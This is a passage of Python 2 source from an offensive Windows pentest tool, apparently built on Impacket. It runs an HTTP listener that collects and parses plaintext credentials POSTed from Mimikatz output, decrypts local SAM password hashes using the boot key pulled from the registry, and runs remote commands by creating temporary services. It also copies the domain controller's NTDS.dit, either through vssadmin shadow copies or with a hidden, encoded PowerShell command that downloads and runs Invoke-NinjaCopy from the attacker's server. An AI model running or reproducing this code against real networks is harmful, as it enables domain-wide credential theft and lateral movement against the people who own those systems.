('NameLength','<L=0'),
('Unknown2','<L=0'),
('FullNameOffset','<L=0'),
('FullNameLength','<L=0'),
('Unknown3','<L=0'),
('CommentOffset','<L=0'),
('CommentLength','<L=0'),
('Unknown3','<L=0'),
('UserCommentOffset','<L=0'),
('UserCommentLength','<L=0'),
('Unknown4','<L=0'),
('Unknown5','12s=""'),
('HomeDirOffset','<L=0'),
('HomeDirLength','<L=0'),
('Unknown6','<L=0'),
('HomeDirConnectOffset','<L=0'),
('HomeDirConnectLength','<L=0'),
('Unknown7','<L=0'),
('ScriptPathOffset','<L=0'),
('ScriptPathLength','<L=0'),
('Unknown8','<L=0'),
('ProfilePathOffset','<L=0'),
('ProfilePathLength','<L=0'),
('Unknown9','<L=0'),
('WorkstationsOffset','<L=0'),
('WorkstationsLength','<L=0'),
('Unknown10','<L=0'),
('HoursAllowedOffset','<L=0'),
('HoursAllowedLength','<L=0'),
('Unknown11','<L=0'),
('Unknown12','12s=""'),
('LMHashOffset','<L=0'),
('LMHashLength','<L=0'),
('Unknown13','<L=0'),
('NTHashOffset','<L=0'),
('NTHashLength','<L=0'),
('Unknown14','<L=0'),
('Unknown15','24s=""'),
('Data',':=""'),
)
class NL_RECORD(Structure):
structure = (
('UserLength','<H=0'),
('DomainNameLength','<H=0'),
('EffectiveNameLength','<H=0'),
('FullNameLength','<H=0'),
('MetaData','52s=""'),
('FullDomainLength','<H=0'),
('Length2','<H=0'),
('CH','16s=""'),
('T','16s=""'),
('EncryptedData',':'),
)
class SAMR_RPC_SID_IDENTIFIER_AUTHORITY(Structure):
structure = (
('Value','6s'),
)
class SAMR_RPC_SID(Structure):
structure = (
('Revision','<B'),
('SubAuthorityCount','<B'),
('IdentifierAuthority',':',SAMR_RPC_SID_IDENTIFIER_AUTHORITY),
('SubLen','_-SubAuthority','self["SubAuthorityCount"]*4'),
('SubAuthority',':'),
)
def formatCanonical(self):
ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority']['Value'][5]))
for i in range(self['SubAuthorityCount']):
ans += '-%d' % ( unpack('>L',self['SubAuthority'][i*4:i*4+4])[0])
return ans
class MimikatzServer(BaseHTTPRequestHandler):
def do_GET(self):
if self.path[1:] in os.listdir('served_over_http'):
self.send_response(200)
self.end_headers()
with open('served_over_http/'+ self.path[1:], 'r') as script:
self.wfile.write(script.read())
elif args.path:
if self.path[1:] == args.path.split('/')[-1]:
self.send_response(200)
self.end_headers()
with open(args.path, 'rb') as rbin:
self.wfile.write(rbin.read())
else:
self.send_response(404)
self.end_headers()
def do_POST(self):
self.send_response(200)
self.end_headers()
length = int(self.headers.getheader('content-length'))
data = self.rfile.read(length)
buf = StringIO.StringIO(data).readlines()
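        # Mimikatz sekurlsa output lists Username / Domain / Password on
        # consecutive lines, so whenever a non-null Password line shows up the
        # two preceding lines are read back to rebuild the full credential.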
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip()
user = buf[i-2].split(':')[1].strip()
print_succ('{} Found plain text creds! Domain: {} Username: {} Password: {}'.format(self.client_address[0], yellow(domain), yellow(user), yellow(passw)))
i += 1
credsfile_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
with open('logs/' + credsfile_name, 'w') as creds:
creds.write(data)
print_status("{} Saved POST data to {}".format(self.client_address[0], yellow(credsfile_name)))
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','yomama')
smbConfig.set('global','server_os','REDSTAR')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file', 'smb.log')
smbConfig.set('global','credentials_file','')
# Let's add a dummy share
smbConfig.add_section(DUMMY_SHARE)
smbConfig.set(DUMMY_SHARE,'comment','')
smbConfig.set(DUMMY_SHARE,'read only','no')
smbConfig.set(DUMMY_SHARE,'share type','0')
smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)
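        # The writable dummy share is where targets redirect command output
        # when results are caught over SMB (see TSCH_EXEC's SERVER mode)
        # instead of being read back from the target's own ADMIN$\Temp.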
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.smb.processConfigFile()
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
class OfflineRegistry:
def __init__(self, hiveFile = None, isRemote = False):
self.__hiveFile = hiveFile
if self.__hiveFile is not None:
self.__registryHive = winregistry.Registry(self.__hiveFile, isRemote)
def enumKey(self, searchKey):
parentKey = self.__registryHive.findKey(searchKey)
if parentKey is None:
return
keys = self.__registryHive.enumKey(parentKey)
return keys
def enumValues(self, searchKey):
key = self.__registryHive.findKey(searchKey)
if key is None:
return
values = self.__registryHive.enumValues(key)
return values
def getValue(self, keyValue):
value = self.__registryHive.getValue(keyValue)
if value is None:
return
return value
def getClass(self, className):
value = self.__registryHive.getClass(className)
if value is None:
return
return value
def finish(self):
if self.__hiveFile is not None:
# Remove temp file and whatever else is needed
self.__registryHive.close()
class SAMHashes(OfflineRegistry):
def __init__(self, samFile, bootKey, isRemote = True):
OfflineRegistry.__init__(self, samFile, isRemote)
self.__samFile = samFile
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__cryptoCommon = CryptoCommon()
self.__itemsFound = {}
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def getHBootKey(self):
#logging.debug('Calculating HashedBootKey from SAM')
QWERTY = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = "0123456789012345678901234567890123456789\0"
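        # QWERTY and DIGITS are the fixed salts from the SysKey scheme:
        # rc4Key = MD5(F.Key0.Salt + QWERTY + bootKey + DIGITS) decrypts the
        # hashed boot key, and the stored checksum is recomputed below to
        # detect a SysKey startup password.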
F = self.getValue(ntpath.join('SAM\Domains\Account','F'))[1]
domainData = DOMAIN_ACCOUNT_F(F)
rc4Key = self.MD5(domainData['Key0']['Salt'] + QWERTY + self.__bootKey + DIGITS)
rc4 = ARC4.new(rc4Key)
self.__hashedBootKey = rc4.encrypt(domainData['Key0']['Key']+domainData['Key0']['CheckSum'])
# Verify key with checksum
checkSum = self.MD5( self.__hashedBootKey[:16] + DIGITS + self.__hashedBootKey[:16] + QWERTY)
if checkSum != self.__hashedBootKey[16:]:
raise Exception('hashedBootKey CheckSum failed, Syskey startup password probably in use! :(')
def __decryptHash(self, rid, cryptedHash, constant):
# Section 2.2.11.1.1 Encrypting an NT or LM Hash Value with a Specified Key
# plus hashedBootKey stuff
Key1,Key2 = self.__cryptoCommon.deriveKey(rid)
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
rc4Key = self.MD5( self.__hashedBootKey[:0x10] + pack("<L",rid) + constant )
rc4 = ARC4.new(rc4Key)
key = rc4.encrypt(cryptedHash)
decryptedHash = Crypt1.decrypt(key[:8]) + Crypt2.decrypt(key[8:])
return decryptedHash
def dump(self):
NTPASSWORD = "NTPASSWORD\0"
LMPASSWORD = "LMPASSWORD\0"
if self.__samFile is None:
# No SAM file provided
return
sam_hashes = []
#logging.info('Dumping local SAM hashes (uid:rid:lmhash:nthash)')
self.getHBootKey()
usersKey = 'SAM\\Domains\\Account\\Users'
# Enumerate all the RIDs
rids = self.enumKey(usersKey)
# Remove the Names item
try:
rids.remove('Names')
except:
pass
for rid in rids:
userAccount = USER_ACCOUNT_V(self.getValue(ntpath.join(usersKey,rid,'V'))[1])
rid = int(rid,16)
V = userAccount['Data']
userName = V[userAccount['NameOffset']:userAccount['NameOffset']+userAccount['NameLength']].decode('utf-16le')
if userAccount['LMHashLength'] == 20:
encLMHash = V[userAccount['LMHashOffset']+4:userAccount['LMHashOffset']+userAccount['LMHashLength']]
else:
encLMHash = ''
if userAccount['NTHashLength'] == 20:
encNTHash = V[userAccount['NTHashOffset']+4:userAccount['NTHashOffset']+userAccount['NTHashLength']]
else:
encNTHash = ''
lmHash = self.__decryptHash(rid, encLMHash, LMPASSWORD)
ntHash = self.__decryptHash(rid, encNTHash, NTPASSWORD)
if lmHash == '':
lmHash = ntlm.LMOWFv1('','')
if ntHash == '':
ntHash = ntlm.NTOWFv1('','')
answer = "%s:%d:%s:%s:::" % (userName, rid, hexlify(lmHash), hexlify(ntHash))
self.__itemsFound[rid] = answer
sam_hashes.append(answer)
return sam_hashes
def export(self, fileName):
if len(self.__itemsFound) > 0:
items = sorted(self.__itemsFound)
fd = open(fileName+'.sam','w+')
for item in items:
fd.write(self.__itemsFound[item]+'\n')
fd.close()
class CryptoCommon:
# Common crypto stuff used over different classes
def transformKey(self, InputKey):
# Section 2.2.11.1.2 Encrypting a 64-Bit Block with a 7-Byte Key
OutputKey = []
OutputKey.append( chr(ord(InputKey[0]) >> 0x01) )
OutputKey.append( chr(((ord(InputKey[0])&0x01)<<6) | (ord(InputKey[1])>>2)) )
OutputKey.append( chr(((ord(InputKey[1])&0x03)<<5) | (ord(InputKey[2])>>3)) )
OutputKey.append( chr(((ord(InputKey[2])&0x07)<<4) | (ord(InputKey[3])>>4)) )
OutputKey.append( chr(((ord(InputKey[3])&0x0F)<<3) | (ord(InputKey[4])>>5)) )
OutputKey.append( chr(((ord(InputKey[4])&0x1F)<<2) | (ord(InputKey[5])>>6)) )
OutputKey.append( chr(((ord(InputKey[5])&0x3F)<<1) | (ord(InputKey[6])>>7)) )
OutputKey.append( chr(ord(InputKey[6]) & 0x7F) )
for i in range(8):
OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
return "".join(OutputKey)
def deriveKey(self, baseKey):
# 2.2.11.1.3 Deriving Key1 and Key2 from a Little-Endian, Unsigned Integer Key
# Let I be the little-endian, unsigned integer.
# Let I[X] be the Xth byte of I, where I is interpreted as a zero-base-index array of bytes.
# Note that because I is in little-endian byte order, I[0] is the least significant byte.
# Key1 is a concatenation of the following values: I[0], I[1], I[2], I[3], I[0], I[1], I[2].
# Key2 is a concatenation of the following values: I[3], I[0], I[1], I[2], I[3], I[0], I[1]
key = pack('<L',baseKey)
key1 = key[0] + key[1] + key[2] + key[3] + key[0] + key[1] + key[2]
key2 = key[3] + key[0] + key[1] + key[2] + key[3] + key[0] + key[1]
return self.transformKey(key1),self.transformKey(key2)
class RemoteFile:
def __init__(self, smbConnection, fileName):
self.__smbConnection = smbConnection
self.__fileName = fileName
self.__tid = self.__smbConnection.connectTree('ADMIN$')
self.__fid = None
self.__currentOffset = 0
def open(self):
self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName)
def seek(self, offset, whence):
# Implement whence, for now it's always from the beginning of the file
if whence == 0:
self.__currentOffset = offset
def read(self, bytesToRead):
if bytesToRead > 0:
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
self.__currentOffset += len(data)
return data
return ''
def close(self):
if self.__fid is not None:
self.__smbConnection.closeFile(self.__tid, self.__fid)
self.__smbConnection.deleteFile('ADMIN$', self.__fileName)
self.__fid = None
def tell(self):
return self.__currentOffset
def __str__(self):
return "\\\\%s\\ADMIN$\\%s" % (self.__smbConnection.getRemoteHost(), self.__fileName)
class RemoteOperations:
def __init__(self, smbConnection):
self.__smbConnection = smbConnection
self.__smbConnection.setTimeout(5*60)
self.__serviceName = 'RemoteRegistry'
self.__stringBindingWinReg = r'ncacn_np:445[\pipe\winreg]'
self.__rrp = None
self.__regHandle = None
self.__stringBindingSamr = r'ncacn_np:445[\pipe\samr]'
self.__samr = None
self.__domainHandle = None
self.__domainName = None
self.__drsr = None
self.__hDrs = None
self.__NtdsDsaObjectGuid = None
self.__doKerberos = None
self.__bootKey = ''
self.__disabled = False
self.__shouldStop = False
self.__started = False
self.__stringBindingSvcCtl = r'ncacn_np:445[\pipe\svcctl]'
self.__scmr = None
self.__tmpServiceName = None
self.__serviceDeleted = False
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__shell = '%COMSPEC% /Q /c '
self.__output = '%SYSTEMROOT%\\Temp\\' + OUTPUT_FILENAME
self.__answerTMP = ''
def __connectSvcCtl(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)
rpc.set_smb_connection(self.__smbConnection)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
def __connectWinReg(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)
rpc.set_smb_connection(self.__smbConnection)
self.__rrp = rpc.get_dce_rpc()
self.__rrp.connect()
self.__rrp.bind(rrp.MSRPC_UUID_RRP)
def connectSamr(self, domain):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSamr)
rpc.set_smb_connection(self.__smbConnection)
self.__samr = rpc.get_dce_rpc()
self.__samr.connect()
self.__samr.bind(samr.MSRPC_UUID_SAMR)
resp = samr.hSamrConnect(self.__samr)
serverHandle = resp['ServerHandle']
resp = samr.hSamrLookupDomainInSamServer(self.__samr, serverHandle, domain)
resp = samr.hSamrOpenDomain(self.__samr, serverHandle=serverHandle, domainId=resp['DomainId'])
self.__domainHandle = resp['DomainHandle']
self.__domainName = domain
def __connectDrds(self):
stringBinding = epm.hept_map(self.__smbConnection.getRemoteHost(), drsuapi.MSRPC_UUID_DRSUAPI,
protocol='ncacn_ip_tcp')
rpc = transport.DCERPCTransportFactory(stringBinding)
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*(self.__smbConnection.getCredentials()))
rpc.set_kerberos(self.__doKerberos)
self.__drsr = rpc.get_dce_rpc()
self.__drsr.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if self.__doKerberos:
self.__drsr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
self.__drsr.connect()
self.__drsr.bind(drsuapi.MSRPC_UUID_DRSUAPI)
request = drsuapi.DRSBind()
request['puuidClientDsa'] = drsuapi.NTDSAPI_CLIENT_GUID
drs = drsuapi.DRS_EXTENSIONS_INT()
drs['cb'] = len(drs) #- 4
drs['dwFlags'] = drsuapi.DRS_EXT_GETCHGREQ_V6 | drsuapi.DRS_EXT_GETCHGREPLY_V6 | drsuapi.DRS_EXT_GETCHGREQ_V8 | drsuapi.DRS_EXT_STRONG_ENCRYPTION
drs['SiteObjGuid'] = drsuapi.NULLGUID
drs['Pid'] = 0
drs['dwReplEpoch'] = 0
drs['dwFlagsExt'] = drsuapi.DRS_EXT_RECYCLE_BIN
drs['ConfigObjGUID'] = drsuapi.NULLGUID
drs['dwExtCaps'] = 0
request['pextClient']['cb'] = len(drs)
request['pextClient']['rgb'] = list(str(drs))
resp = self.__drsr.request(request)
self.__hDrs = resp['phDrs']
# Now let's get the NtdsDsaObjectGuid UUID to use when querying NCChanges
resp = drsuapi.hDRSDomainControllerInfo(self.__drsr, self.__hDrs, self.__domainName, 2)
if resp['pmsgOut']['V2']['cItems'] > 0:
self.__NtdsDsaObjectGuid = resp['pmsgOut']['V2']['rItems'][0]['NtdsDsaObjectGuid']
else:
logging.error("Couldn't get DC info for domain %s" % self.__domainName)
raise Exception('Fatal, aborting')
def getDrsr(self):
return self.__drsr
def DRSCrackNames(self, formatOffered=drsuapi.DS_NAME_FORMAT.DS_DISPLAY_NAME,
formatDesired=drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name=''):
if self.__drsr is None:
self.__connectDrds()
resp = drsuapi.hDRSCrackNames(self.__drsr, self.__hDrs, 0, formatOffered, formatDesired, (name,))
return resp
def DRSGetNCChanges(self, userEntry):
if self.__drsr is None:
self.__connectDrds()
request = drsuapi.DRSGetNCChanges()
request['hDrs'] = self.__hDrs
request['dwInVersion'] = 8
request['pmsgIn']['tag'] = 8
request['pmsgIn']['V8']['uuidDsaObjDest'] = self.__NtdsDsaObjectGuid
request['pmsgIn']['V8']['uuidInvocIdSrc'] = self.__NtdsDsaObjectGuid
dsName = drsuapi.DSNAME()
dsName['SidLen'] = 0
dsName['Guid'] = drsuapi.NULLGUID
dsName['Sid'] = ''
dsName['NameLen'] = len(userEntry)
dsName['StringName'] = (userEntry + '\x00')
dsName['structLen'] = len(dsName.getData())
request['pmsgIn']['V8']['pNC'] = dsName
request['pmsgIn']['V8']['usnvecFrom']['usnHighObjUpdate'] = 0
request['pmsgIn']['V8']['usnvecFrom']['usnHighPropUpdate'] = 0
request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL
request['pmsgIn']['V8']['ulFlags'] = drsuapi.DRS_INIT_SYNC | drsuapi.DRS_WRIT_REP
request['pmsgIn']['V8']['cMaxObjects'] = 1
request['pmsgIn']['V8']['cMaxBytes'] = 0
request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ
request['pmsgIn']['V8']['pPartialAttrSet'] = NULL
request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL
request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = NULL
return self.__drsr.request(request)
def getDomainUsers(self, enumerationContext=0):
if self.__samr is None:
self.connectSamr(self.getMachineNameAndDomain()[1])
try:
resp = samr.hSamrEnumerateUsersInDomain(self.__samr, self.__domainHandle,
userAccountControl=samr.USER_NORMAL_ACCOUNT | \
samr.USER_WORKSTATION_TRUST_ACCOUNT | \
samr.USER_SERVER_TRUST_ACCOUNT |\
samr.USER_INTERDOMAIN_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
return resp
def ridToSid(self, rid):
if self.__samr is None:
self.connectSamr(self.getMachineNameAndDomain()[1])
resp = samr.hSamrRidToSid(self.__samr, self.__domainHandle , rid)
return resp['Sid']
def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos
# or not receiving that data during the login process.
# Let's try getting it through RPC
rpc = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\wkssvc]')
rpc.set_smb_connection(self.__smbConnection)
dce = rpc.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
resp = wkst.hNetrWkstaGetInfo(dce, 100)
dce.disconnect()
return resp['WkstaInfo']['WkstaInfo100']['wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100']['wki100_langroup'][:-1]
else:
return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
def getDefaultLoginAccount(self):
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon')
keyHandle = ans['phkResult']
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName')
username = dataValue[:-1]
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultDomainName')
domain = dataValue[:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
if len(domain) > 0:
return '%s\\%s' % (domain,username)
else:
return username
except:
return None
def getServiceAccount(self, serviceName):
try:
# Open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, serviceName)
serviceHandle = ans['lpServiceHandle']
resp = scmr.hRQueryServiceConfigW(self.__scmr, serviceHandle)
account = resp['lpServiceConfig']['lpServiceStartName'][:-1]
scmr.hRCloseServiceHandle(self.__scmr, serviceHandle)
if account.startswith('.\\'):
account = account[2:]
return account
except Exception, e:
logging.error(e)
return None
def __checkServiceStatus(self):
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
self.__serviceHandle = ans['lpServiceHandle']
# Let's check its status
ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)
if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
logging.info('Service %s is in stopped state'% self.__serviceName)
self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
            raise Exception('Unknown service state 0x%x - Aborting' % ans['lpServiceStatus']['dwCurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started is False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
sleep(1)
def enableRegistry(self):
self.__connectSvcCtl()
self.__checkServiceStatus()
self.__connectWinReg()
def __restore(self):
# First of all stop the service if it was originally stopped
if self.__shouldStop is True:
logging.info('Stopping service %s' % self.__serviceName)
scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
if self.__disabled is True:
logging.info('Restoring the disabled state for service %s' % self.__serviceName)
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x4)
if self.__serviceDeleted is False:
# Check again the service we created does not exist, starting a new connection
# Why?.. Hitting CTRL+C might break the whole existing DCE connection
try:
rpc = transport.DCERPCTransportFactory(r'ncacn_np:%s[\pipe\svcctl]' % self.__smbConnection.getRemoteHost())
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*self.__smbConnection.getCredentials())
rpc.set_kerberos(self.__doKerberos)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
resp = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, self.__serviceHandle)
scmr.hRCloseServiceHandle(self.__scmr, self.__scManagerHandle)
rpc.disconnect()
except Exception, e:
# If service is stopped it'll trigger an exception
# If service does not exist it'll trigger an exception
# So. we just wanna be sure we delete it, no need to
# show this exception message
pass
def finish(self):
self.__restore()
if self.__rrp is not None:
self.__rrp.disconnect()
if self.__drsr is not None:
self.__drsr.disconnect()
if self.__samr is not None:
self.__samr.disconnect()
if self.__scmr is not None:
self.__scmr.disconnect()
def getBootKey(self):
bootKey = ''
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
keyHandle = ans['phkResult']
ans = rrp.hBaseRegQueryInfoKey(self.__rrp,keyHandle)
bootKey = bootKey + ans['lpClassOut'][:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
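        # The JD/Skew1/GBG/Data class strings concatenate to a hex-encoded,
        # byte-scrambled boot key; the fixed permutation below restores the
        # real byte order, roughly: bootKey = ''.join(raw[p] for p in transforms).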
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
bootKey = unhexlify(bootKey)
for i in xrange(len(bootKey)):
self.__bootKey += bootKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % hexlify(self.__bootKey))
return self.__bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
try:
dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
except:
noLMHash = 0
if noLMHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def __retrieveHive(self, hiveName):
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
except:
raise Exception("Can't open %s hive" % hiveName)
keyHandle = ans['phkResult']
rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
# Now let's open the remote file, so it can be read later
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
return remoteFileName
def saveSAM(self):
logging.debug('Saving remote SAM database')
return self.__retrieveHive('SAM')
def saveSECURITY(self):
logging.debug('Saving remote SECURITY database')
return self.__retrieveHive('SECURITY')
def __executeRemote(self, data):
self.__tmpServiceName = ''.join([random.choice(string.letters) for _ in range(8)]).encode('utf-16le')
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
command += ' & ' + 'del ' + self.__batchFile
self.__serviceDeleted = False
resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
self.__serviceDeleted = True
scmr.hRCloseServiceHandle(self.__scmr, service)
def __answer(self, data):
self.__answerTMP += data
def __getLastVSS(self):
self.__executeRemote('%COMSPEC% /C vssadmin list shadows')
sleep(5)
tries = 0
while True:
try:
self.__smbConnection.getFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME, self.__answer)
break
except Exception, e:
if tries > 30:
# We give up
raise Exception('Too many tries trying to list vss shadows')
if str(e).find('SHARING') > 0:
# Stuff didn't finish yet.. wait more
sleep(5)
tries +=1
pass
else:
raise
lines = self.__answerTMP.split('\n')
lastShadow = ''
lastShadowFor = ''
# Let's find the last one
# The string used to search the shadow for drive. Wondering what happens
# in other languages
SHADOWFOR = 'Volume: ('
for line in lines:
if line.find('GLOBALROOT') > 0:
lastShadow = line[line.find('\\\\?'):][:-1]
elif line.find(SHADOWFOR) > 0:
lastShadowFor = line[line.find(SHADOWFOR)+len(SHADOWFOR):][:2]
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\' + OUTPUT_FILENAME)
return lastShadow, lastShadowFor
def saveNTDS(self, ninja=False):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
if ninja is True:
logging.info('Registry says NTDS.dit is at %s' % ntdsLocation)
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
local_ip = self.__smbConnection.getSMBServer().get_socket().getsockname()[0]
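            # Invoke-NinjaCopy (PowerSploit) parses the NTFS volume directly,
            # so the live, locked NTDS.dit can be copied without a VSS
            # snapshot; the script is pulled from our local HTTP server.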
command = """
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-NinjaCopy.ps1');
Invoke-NinjaCopy -Path "{ntdspath}" -LocalDestination "$env:systemroot\\Temp\\{tmpname}";
""".format(addr=local_ip, ntdspath=ntdsLocation, tmpname=tmpFileName)
self.__executeRemote('%%COMSPEC%% /C powershell.exe -exec bypass -window hidden -noni -nop -encoded %s' % ps_command(command=command))
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
else:
logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation)
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
